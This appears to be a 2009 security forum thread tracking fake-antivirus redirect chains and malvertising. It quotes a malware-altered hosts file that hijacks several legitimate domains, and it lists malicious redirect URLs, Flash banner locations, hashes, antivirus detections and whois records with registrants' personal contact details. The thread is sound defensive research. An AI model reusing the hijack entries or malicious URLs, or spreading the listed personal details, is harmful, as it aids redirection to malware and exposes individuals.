127.1.1.1 pa.tt-09.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 220.250.64.21
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
222.189.238.6 biz5c.sandai.net
222.189.238.6 recommend.xunlei.com
222.189.238.6 news.51uc.com
222.189.238.6 chat.sina.com.cn
222.189.238.6 hallcenter.ourgame.com

Complete threatexpert report is available here.

Kimberly

Mar 11 2009, 02:07 PM

<h4>

mofideju.ru - beststateuniversity.cn - bestantimalwarescanner.com

</h4>
Antivirus 2009 /2010 / 360 Redirects

mofideju.ru/t.php?x1=[*]&x2=&x3=[*]
beststateuniversity.cn/soft.php?aid=[*]&d=1&refer=[*]
bestantimalwarescanner.com/promo/1/freescan.php?nu=[*]&back=[*]

mofideju.ru - 87.248.180.88

nserver: ns-alt.starnet.md.
nserver: ns.starnet.md.
person: Iosif S Viktorov
phone: +7 4232 579552
e-mail: viktorov@smtp.ru
registrar: REGRU-REG-RIPN
created: 2009.01.12

beststateuniversity.cn - 83.133.126.201

Details

bestantimalwarescanner.com - 194.165.4.7 / 209.160.20.117

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.BASICSTECHNOLOGY.COM - NS2.BASICSTECHNOLOGY.COM - NS3.BASICSTECHNOLOGY.COM
Updated Date: 06-mar-2009
Creation Date: 03-mar-2009

Kimberly

Mar 11 2009, 05:48 PM

<h4>

WARNING: hotmail.com

</h4>
Be very carefull when visiting Hotmail, redirects to Antivirus 360 have been reported. Possible presence of a malvertizement is not excluded. Any additional information is welcome in order to alert the appropriate parties.

Kimberly

Mar 11 2009, 07:23 PM

<h4>

.htaccess redirects to blackpornmix.com

</h4>
Redirects.

blackpornmix.com/in.cgi?4 & parameter=[*]
wwwsafetyscan.com/hitin.php?land=[*]&affid=[*]

blackpornmix.com/in.cgi?4 & parameter=[*]
onlinestabilityexamine.com/hitin.php?land=[*]&affid=[*]

blackpornmix.com/in.cgi?4 & parameter=[*]
securedradiostation.cn/soft.php?aid=[*]&d=1&refer=[*]
best-antimalware-scanner.com/promo/1/freescan.php?nu=[*]&back[*]

Cookies on blackpornmix.com are pointing to us-euro.biz.

Interesting detail, wwwsafetyscan.com and onlinestabilityexamine.com use a Flash file to trigger the download if the victim clicks on the Ok button. The u and t params from the link are used in the actionscript in conjunction with the GetURL method.

<h4>

IP details

</h4>
blackpornmix.com - 195.190.13.234

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CRIMENEWS.ASIA - NS2.CRIMENEWS.ASIA
Updated Date: 28-feb-2009
Creation Date: 19-sep-2008
Registration Service Provided By: ERDOMAIN.COM
Registrant: PrivacyProtect.org
______________________________

wwwsafetyscan.com - 78.129.166.225

Domain Name: WWWSAFETYSCAN.COM
Registrar: REGTIME LTD.
Name Server: NS1.WWWSAFETYSCAN.COM - NS2.WWWSAFETYSCAN.COM
Updated Date: 11-mar-2009
Creation Date: 09-mar-2009

Registrant:
Sherry Reed
Email: sherrymikereed@gmail.com
Address: 4712 Ralph Drive
City: Columbia Station
State: OH
ZIP: 44028
Country: US
Phone: +1.4402369141
______________________________

securedradiostation.cn - 78.47.91.153

ROID: 20090217s10001s99362461-cn
Administrative Email: RoderickKiewiet@gmail.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.basicstechnology.com - ns2.basicstechnology.com - ns3.basicstechnology.com
Registration Date: 2009-02-17 20:43
Expiration Date: 2010-02-17 20:43
______________________________

onlinestabilityexamine.com - 194.165.4.20

Registrar: REGTIME LTD.
Name Server: NS1.ONLINESTABILITYEXAMINE.COM - NS2.ONLINESTABILITYEXAMINE.COM
Updated Date: 04-mar-2009
Creation Date: 03-mar-2009

Registrant:
Alberta Victory
Email: victoryalbertagreg@gmail.com
Address: 3913 Eagle Drive
City: Southfield
State: MI
ZIP: 48235
Country: US
Phone: +1.7347361198
______________________________

best-antimalware-scanner.com - 78.47.91.153 / 83.133.123.174 / 83.133.127.93

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.BASICSTECHNOLOGY.COM - NS2.BASICSTECHNOLOGY.COM - NS3.BASICSTECHNOLOGY.COM
Updated Date: 06-mar-2009
Creation Date: 03-mar-2009

Registrant:
Name: Wilkinson S Judy
Address: Unit 17 Circuit Drive
City: Hendon
Province/state: Adelaide
Country: AU
Postal Code: 201423
Phone: +6.1883472889
Fax: +6.1883472889
Email: info@go2util.com

Kimberly

Mar 13 2009, 04:47 PM

<h4>

measurehits.com - hitoptimist.com - perfect-banner.com

</h4>
First of all, measurehits.com - hitoptimist.com are used in a malvertizement featuring Hewlett-Packard aka HP. The malicious banner has been build with some older obfuscation techniques from last year using Flash 6.
Next we will have a closer look at perfect-banner.com, a domain sharing their Name Server with measurehits.com

Banner.

Campaign.

measurehits.com/?cmpid=[*]&subaff=[*]
hitoptimist.com/c/index.php?id=[*]

Nameservers from measurehits.com reveal another interesting domain called perfect-banner.com. Sounds perfect as an advertising bureau isn't it? Navigating to the website does not reveal an advertising bureau but a login page for OpenX, a free ad server for web publishers. See also Wikipedia. All content from perfect-banner.com should be treated with extreme caution.

<h4>

IP Details

</h4>
measurehits.com - 212.117.165.128

Registrar: YESNIC CO. LTD.
Whois Server: whois.yesnic.com
Name Server: NS1.MEASUREHITS.COM - NS2.MEASUREHITS.COM - NS3.MEASUREHITS.COM
Updated Date: 05-mar-2009
Creation Date: 26-feb-2009
Registrant:
Name : Gabriel Jenks
Email : gabrielcjenks17@mail.com
Address : 3515 Cooks Mine Road
Zipcode : 88101
Nation : US
Tel : 1 505-763-5453

hostnames sharing ip with a-records

statsnclick.com | waytotheprofit.com

other names of the nameservers

89-149-226-121.internetserviceteam.com | mail.xxx-online.in | ns1.hit-detect.com | ns1.statisticsishere.com | ns1.statsnclick.com | ns2.02sta.com | ns2.admediastats.com | ns2.hit-detect.com | ns2.onlinestatsmanager.com | ns2.perfect-banner.com | ns2.promorotation.com | ns2.securityclick.net | ns2.st-athome.net |ns2.st-aticglobalsources.com | ns2.statisticsishere.com | ns2.statsnclick.com | ns2.themonitoring.net | ns2.traffic-analytics.com | ns2.waytotheprofit.com | ns3.02sta.com | ns3.admediastats.com | ns3.hit-detect.com | ns3.perfect-banner.com | ns3.promorotation.com | ns3.securityclick.net | ns3.st-athome.net | ns3.st-aticglobalsources.com | ns3.statisticsishere.com | ns3.statsnclick.com | ns3.themonitoring.net | ns3.traffic-analytics.com | ns3.waytotheprofit.com | ns4.02sta.com | ns4.admediastats.com | ns4.hit-detect.com | ns4.onlinestatsmanager.com | ns4.perfect-banner.com | ns4.promorotation.com | ns4.securityclick.net | ns4.st-athome.net | ns4.st-aticglobalsources.com | ns4.statsnclick.com | ns4.themonitoring.net | ns4.traffic-analytics.com | ns4.waytotheprofit.com | www.xxx-online.in
______________________________

hitoptimist.com - 88.198.8.15

Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Updated Date: 10-mar-2009
Creation Date: 10-mar-2009
Contact Information : Private

hostnames sharing ip with a-records

cosmotraf.net | download.pcprivacycleaner.com | download.powerfulvirusremover2008.com | static.88-198-8-15.clients.your-server.de | sw.effectiveload.com | ydmstats.com
______________________________

perfect-banner.com - 89.149.244.137

Website Title: OpenX
IP Location - Germany - Netdirekt E.k
Registrar: ENOM, INC.
Name Server: NS1.PERFECT-BANNER.COM - NS2.PERFECT-BANNER.COM - NS3.PERFECT-BANNER.COM -NS4.PERFECT-BANNER.COM
Updated Date: 11-mar-2009
Creation Date: 10-mar-2009

Registrant Contact: Nexton Limited
Whois Agent (support@ruler-domains.com)
+380993161649
Fax: +380993161649
Irpinskaya 69
Kiev, 03142
UA

Kimberly

Mar 27 2009, 10:42 AM

<h4>

Flash.swf & Load.exe

</h4>
Flash.swf.

Additional information
File size: 16601 bytes
MD5...: ab82af086b8de27dd83e302b0a41396c
SHA1..: 644a24540d832774e4683124d27f33bae84bd06e
SHA256: 399fbcd983158c9f741684706ae45402a13995338a4f01eaf7d9a6ad6828e290
PEInfo: -
packers (Kaspersky): Swf2Swc

File flash.swf received on 03.27.2009 11:06:52 (CET)

QUOTE

a-squared 4.0.0.101 2009.03.27 -
AhnLab-V3 5.0.0.2 2009.03.27 -
AntiVir 7.9.0.129 2009.03.27 -
Antiy-AVL 2.0.3.1 2009.03.27 -
Authentium 5.1.2.4 2009.03.27 -
Avast 4.8.1335.0 2009.03.26 -
AVG 8.5.0.283 2009.03.27 -
BitDefender 7.2 2009.03.27 -
CAT-QuickHeal 10.00 2009.03.26 -
ClamAV 0.94.1 2009.03.27 -
Comodo 1086 2009.03.27 -
DrWeb 4.44.0.09170 2009.03.27 -
eSafe 7.0.17.0 2009.03.26 -
eTrust-Vet 31.6.6420 2009.03.27 -
F-Prot 4.4.4.56 2009.03.26 -
F-Secure 8.0.14470.0 2009.03.27 -
Fortinet 3.117.0.0 2009.03.27 -
GData 19 2009.03.27 -
Ikarus T3.1.1.48.0 2009.03.27 -
K7AntiVirus 7.10.682 2009.03.26 -
Kaspersky 7.0.0.125 2009.03.27 -
McAfee 5565 2009.03.26 -
McAfee+Artemis 5565 2009.03.26 -
McAfee-GW-Edition 6.7.6 2009.03.27 -
Microsoft 1.4502 2009.03.27 -
NOD32 3968 2009.03.27 -
Norman 6.00.06 2009.03.26 -
nProtect 2009.1.8.0 2009.03.27 -
Panda 10.0.0.10 2009.03.27 -
PCTools 4.4.2.0 2009.03.26 -
Prevx1 V2 2009.03.27 -
Rising 21.22.41.00 2009.03.27 -
Sophos 4.40.0 2009.03.27 -
Sunbelt 3.2.1858.2 2009.03.26 -
Symantec 1.4.4.12 2009.03.27 -
TheHacker 6.3.3.7.292 2009.03.26 -
TrendMicro 8.700.0.1004 2009.03.27 -
VBA32 3.12.10.1 2009.03.26 -
ViRobot 2009.3.26.1664 2009.03.26 -
VirusBuster 4.6.5.0 2009.03.26 -

Flash Code.

XORED Binary data containing a link to an executable on the same server. We also notice the presence of the XOR key in the code.

Load.exe.

Additional information
File size: 27136 bytes
MD5...: a7093c12e0d0e61f1720d097d1f07fc7
SHA1..: ea7e2f7358fd8fb0a989abb800a17561a144245d
SHA256: 49584e8b956242dd4958025b69d71469f1cb54298bcbcb0647b3c70241eb767c
PEiD..: -
ThreatExpert Info

File load.exe received on 03.27.2009 11:33:38 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.27 Backdoor.Win32.Zdoogu!IK
AhnLab-V3 5.0.0.2 2009.03.27 Win-Trojan/Xema.27136.G
AntiVir 7.9.0.129 2009.03.27 TR/Crypt.XPACK.Gen
Antiy-AVL 2.0.3.1 2009.03.27 -
Authentium 5.1.2.4 2009.03.27 -
Avast 4.8.1335.0 2009.03.26 Win32:Walpak
AVG 8.5.0.283 2009.03.27 Generic13.LBZ
BitDefender 7.2 2009.03.27 -
CAT-QuickHeal 10.00 2009.03.26 -
ClamAV 0.94.1 2009.03.27 -
Comodo 1086 2009.03.27 -
DrWeb 4.44.0.09170 2009.03.27 Trojan.Inject.5512
eSafe 7.0.17.0 2009.03.26 Win32.TRCrypt.XPACK
eTrust-Vet 31.6.6420 2009.03.27 -
F-Prot 4.4.4.56 2009.03.26 -
F-Secure 8.0.14470.0 2009.03.27 Backdoor.Win32.Zdoogu.bl
Fortinet 3.117.0.0 2009.03.27 -
GData 19 2009.03.27 Win32:Walpak
Ikarus T3.1.1.48.0 2009.03.27 Backdoor.Win32.Zdoogu
K7AntiVirus 7.10.682 2009.03.26 -
Kaspersky 7.0.0.125 2009.03.27 Backdoor.Win32.Zdoogu.bl
McAfee 5565 2009.03.26 -
McAfee+Artemis 5565 2009.03.26 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.03.27 Trojan.Crypt.XPACK.Gen
Microsoft 1.4502 2009.03.27 TrojanDownloader:Win32/Bredolab.B
NOD32 3969 2009.03.27 a variant of Win32/Kryptik.LI
Norman 6.00.06 2009.03.26 -
nProtect 2009.1.8.0 2009.03.27 Backdoor/W32.Zdoogu.27136
Panda 10.0.0.10 2009.03.27 -
PCTools 4.4.2.0 2009.03.26 -
Prevx1 V2 2009.03.27 High Risk Cloaked Malware
Rising 21.22.41.00 2009.03.27 -
Sophos 4.40.0 2009.03.27 -
Sunbelt 3.2.1858.2 2009.03.26 Backdoor.Win32.Zdoogu.bl
Symantec 1.4.4.12 2009.03.27 Trojan Horse
TheHacker 6.3.3.7.292 2009.03.26 -
TrendMicro 8.700.0.1004 2009.03.27 -
VBA32 3.12.10.1 2009.03.26 -
ViRobot 2009.3.26.1664 2009.03.26 -
VirusBuster 4.6.5.0 2009.03.26 Trojan.Waledac.Gen!Pac.8

Kimberly

Mar 28 2009, 08:39 AM

<h4>

netservice2.net - gointoscan.com - fuse4scan.com

</h4>

Internet Antivirus Redirects.

netservice2.net/redirect/
gointoscan.com/?uid=[*]
fuse4scan.com/?uid=[*]

Antivirus 2009 /2010 / 360 is replaced by Internet Antivirus at the time of the writeup.

Closing the webpage using ALT + F4 will trigger a nag screen and initiate a direct download.

Upon closing the nagscreen, an ultimate alert about a privacy violation will be displayed in order to scare the victim.

netservice2.net - 212.95.63.237

Updated Date: 05-jan-2009
Creation Date: 05-jan-2009
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET
Registrar: BIZCN.COM, INC.

Registrant Contact:
Steven Lucas steven_lucas_2000@yahoo.com
+1.3023892438 fax: +1.3023892438
5215/2 SW 152 Court
Beaverton NA 97011
us

gointoscan.com - 78.159.101.27

Updated Date: 04-mar-2009
Creation Date: 03-mar-2009
Name Server: NS1.DNSEXIT.COM - NS2.DNSEXIT.COM
Registrar: REGTIME LTD.

Registrant:
Mario Simone
Email: ficdomba@gmail.com
Organization: Private person
Address: Corso Vittorio Emanuele 47
City: Torino
State: Torino
ZIP: 10125
Country: IT
Phone: +39.0116505771

fuse4scan.com - 78.159.101.27

Updated Date: 23-mar-2009
Creation Date: 23-mar-2009
Name Server: NS1.DNSEXIT.COM - NS2.DNSEXIT.COM
Registrar: UK2 GROUP LTD.

Registrant:
Jan Wanjiku (riebeniz@gmail.com)
Dzouva 1
Ancient Olympia
null,G27065
GR
Tel. +26.24023850

Kimberly

Mar 30 2009, 05:38 AM

<h4>

mediatraff.com - 72.232.107.18

</h4>
In the past we already noticed that the bad guys simply used the same sentences to describe their activities on different websites instead of being creative. Today I would like to draw your attention to a "copy content rip" when reading the MediaTraff about us page.
Back in December 2008 Koeppel Interactive was being impersonated using the domain koeppelinteractive.co.uk. Is MediaTraff trying to archive the same or is the paragraph used below a simple coincidence?

QUOTE
a new media advertising agency providing online media buying, interactive video advertising and on-demand media buying services to the direct response industry. Our mission is to deliver next generation direct response campaigns that are impactful, profitable and always exceed our clients' expectations.

mediatraff.com - 72.232.107.18

Updated Date: 01-oct-2008
Creation Date: 25-sep-2008
Name Server: NS1.MEDIATRAFF.COM - NS2.MEDIATRAFF.COM
Registrar: MONIKER ONLINE SERVICES, INC.

Registrant [1542303]:
David, Joner support@MediaTraff.com
MediaTraff Inc.
37 Highland Ave
White River Junction
VT
05001
US

Kimberly

Apr 3 2009, 02:37 PM

<h4>

carpass.blogspot.com

</h4>
Looks like someone has a slight grief against Bluetack since they did put a heavy load on our server using a blogspot page containing links - disguised as 1 pixel images - to our forum. carpass.blogspot.com was probably used in some dodgy advertising rotator seeing the huge amount of IP's hammering our server. Sincere apologies to anyone experiencing trouble reaching our website during the period between 31 March and 2 April. Special thanks fly out to the Google blogger team for their speedy action in taking down carpass.blogspot.com.

The BISS Admin Team.

Kimberly

Apr 9 2009, 04:14 PM

<h4>

Warning: Circulating Malvertizements

</h4>
It has been brought to my attention that a huge amount of malvertizements are still circulating although some are 2 months old. As seen below, the bad guys remain very active and manage to sell their malicious banners to several different high profile advertising agencies. Some of them have been a victim in the past and from what I see still are not precautious enough when accepting advertisements that continue to infect innocent users.

Furthermore all content from perfect-banner.com should be considered as unsafe. More details.

Rhapsody

m1.2mdn.net/2190195/rhapsody728x90.swf
web.checkm8.com/data/460377/rhapsody728x90.swf
perfect-banner.com/www/images/rhapsody-photobucket728x90.swf
perfect-banner.com/www/images/rhapsody-interevco728x90.swf
www.alibi.com/includes/ruxton/rhapsody728x90.swf
ads.live365.com/sponsors/rhapsody/rhapsody728x90.swf
imagec12.247realmedia.com/RealMedia/ads/Creatives/TheVoice/all_Rhapsody_032409_728_rem/rhapsody728x90.swf/1237928016
imagec12.247realmedia.com/RealMedia/ads/Creatives/LikeMe/rux_Rhapsody_032409_728_rem/rhapsody728x90.swf/1237928635
imagec14.247realmedia.com/RealMedia/ads/Creatives/RevPub/acw_ruxton_rhapsody_032509/rhapsody728x90.swf/1238008035
imagec14.247realmedia.com/RealMedia/ads/Creatives/RevPub/pw_ruxton_rhapsody/rhapsody728x90.swf/1237923880
imagec05.247realmedia.com/RealMedia/ads/Creatives/CtyPaper/0903_ruxton_rhapsody/rhapsody728x90.swf/1237926269
gorillafights.com/adsmanager/www/delivery/ai.php?filename=rhapsody_728x90.swf
ads.tucsonweekly.com/ads/adimage.php?filename=rhapsody728x90_2.swf
banners.thestranger.com/ads/adimage.php?filename=rhapsody728x90.swf
ads.memphisflyer.com/phpadsnew/adimage.php?filename=rhapsody728x90.swf
ads.boiseweekly.com/ads/adimage.php?filename=rhapsody728x90.swf
www.fwweekly.com/files/banner_ads/rhapsody728x90.swf
ads.avenews.com/adimage.php?filename=ruxton_rhapsody728x90.swf
citybeat.wehaa-ads.com/www/delivery/ai.php?filename=rhapsody728x90.swf&contenttype=swf
c3.openx.org/574bdfcaf65ecedb190b2d1c8f0fa48c.swf

m1.2mdn.net/2190195/rhapsody300x250.swf
mc.dailymotion.com/masscast/0/OasDefault/US_Rhapsod_6509_2773/rhapsody300x250.swf
perfect-banner.com/www/images/rhapsody-photobucket300x250.swf
perfect-banner.com/www/images/rhapsody-interevco300x250.swf
perfect-banner.com/www/images/rhapsody300x250-ugo2.swf
ads.live365.com/sponsors/rhapsody/rhapsody300x250.swf
ads.live365.com/sponsors/rhapsody/rhapsody300x250.swf
imagec05.247realmedia.com/RealMedia/ads/Creatives/HlywdSer/9261_HW_Rhapsody_com_300_ROS/rhapsody_300x250.swf/1238180607

m1.2mdn.net/2190195/rhapsody160x600.swf
perfect-banner.com/www/images/rhapsody-photobucket160x600.swf
ads.live365.com/sponsors/rhapsody/rhapsody160x600.swf

HP - Hewlett Packard

logiagroup.checkm8.com/data/478091/HP_468x60.swf

logiagroup.checkm8.com/data/478089/HP_728x90.swf
logiagroup.checkm8.com/data/479237/HP_728x90.swf
d13.zedo.com/OzoDB/s/z/538758/V1/hp_728x90.swf

logiagroup.checkm8.com/data/479231/HP_300x250.swf
d13.zedo.com/OzoDB/7/0/538809/V1/hp_300x250.swf
imagec10.247realmedia.com/RealMedia/ads/Creatives/PhoenixMedia/BO-YourDirectMedia-0403-300250/HP_300xx250.swf/1238793170

ads.advance.net/RealMedia/ads/Creatives/NJONLINE/Hewlett01_NJ_RoS_Sky/HP_160x600.swf

TravelWise

static.jpxpt.com/RealMedia/ads/Creatives/OasDefault/TravelVise_728x90/TW_728x90.swf
static.jpnt6.0t.com/RealMedia/ads/Creatives/OasDefault/TravelVise_728x90/TW_728x90.swf
bmp.outreach.com/content/travel_wise5_728x90.swf

cache.fimservecdn.com/contents/507/241/241507/CR_travel.myspace.2march.2009_030209.swf
cache.fimservecdn.com/contents/507/241/241507/myspace.swf

Swatch

perfect-banner.com/www/images/728x90_2.swf
perfect-banner.com/www/images/728x90_3.swf

perfect-banner.com/www/images/336x280.swf
perfect-banner.com/www/images/336x280_2.swf

perfect-banner.com/www/images/swatch160_601.swf

Softlens

limelight.smartadserver.com/diff/242/430304/Softlens_creative_update.swf

Jobfox

ads.beyond.com/banners/jobfox_468x60.swf

ETrade

imagec05.247realmedia.com/RealMedia/ads/Creatives/Trademkt/eTrade0409-150x40/etrade150x40.swf/1239037976

Skyauction

banner.pando.com/adimage.php?filename=skyauction468x60.swf

<h4>

Redirects associated to the different malvertizements

</h4>
st-aticglobalsources.com/c/index.php?id=[*]
securityclick.net/?cmpid=[*]&id=[*]&website=[*]

st-ation-appraisals.net/c/index.php?id=[*]
securityclick.net/?cmpid=[*]&id=[*]&website=[*]

hitoptimist.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

hit-detect.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]&m=[*]

of-ficialstat.com/c/index.php?id=[*]
securityclick.net/?cmpid=[*]

stats-manager-online.com/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]&id=[*]&client=[*]

traffic-analytics.com/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]

googlesearchingweb.net/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]

statisticsishere.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]

hitoptimist.com/c/index.php?id=[*]
statsnclick.com/?cmpid=[*]

hit-detect.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]

statisticsishere.com/c/index.php?id=
measurehits.com/?cmpid=[*]&url=[*]&id=[*]

cosmotraf.net/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

cosmotraf.net/c/index.php?id=[*]
pleaselinkmeto.com/?cmpid=[*]

ydmstats.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]

Victims will be redirected to a fake online scanner, removespywarethreats.com in the sample.

<h4>

IP Details

</h4>
st-aticglobalsources.com

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.ST-ATICGLOBALSOURCES.COM - NS2.ST-ATICGLOBALSOURCES.COM - NS3.ST-ATICGLOBALSOURCES.COM - NS4.ST-ATICGLOBALSOURCES.COM
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

st-ation-appraisals.net

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.ST-ATION-APPRAISALS.NET - NS2.ST-ATION-APPRAISALS.NET - NS3.ST-ATION-APPRAISALS.NET - NS4.ST-ATION-APPRAISALS.NET
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

of-ficialstat.com

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.OF-FICIALSTAT.COM - NS2.OF-FICIALSTAT.COM - NS3.OF-FICIALSTAT.COM - NS4.OF-FICIALSTAT.COM
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

clickanalytic.com

Status: clientHold
Updated Date: 12-mar-2009
Creation Date: 06-feb-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Sergey Belonozhko (vaska4yvak@mail.com)

googlesearchingweb.net

Status: clientHold
Updated Date: 12-mar-2009
Creation Date: 05-feb-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Sergey Belonozhko (vaska4yvak@mail.com)

securityclick.net

Status: clientHold
Updated Date: 26-mar-2009
Name Server: DNS1.NAME-SERVICES.COM - DNS2.NAME-SERVICES.COM - DNS3.NAME-SERVICES.COM - DNS4.NAME-SERVICES.COM -DNS5.NAME-SERVICES.COM
noo - Serg Moons (moon.serg@gmail.com)

stats-manager-online.com

Status: clientHold
Updated Date: 05-mar-2009
Creation Date: 05-feb-2009
NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
PrivacyProtect.org

traffic-analytics.com

Status: clientHold
Updated Date: 05-mar-2009
Creation Date: 06-feb-2009
NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
PrivacyProtect.org

hitoptimist.com - 88.198.8.15

Updated Date: 10-mar-2009
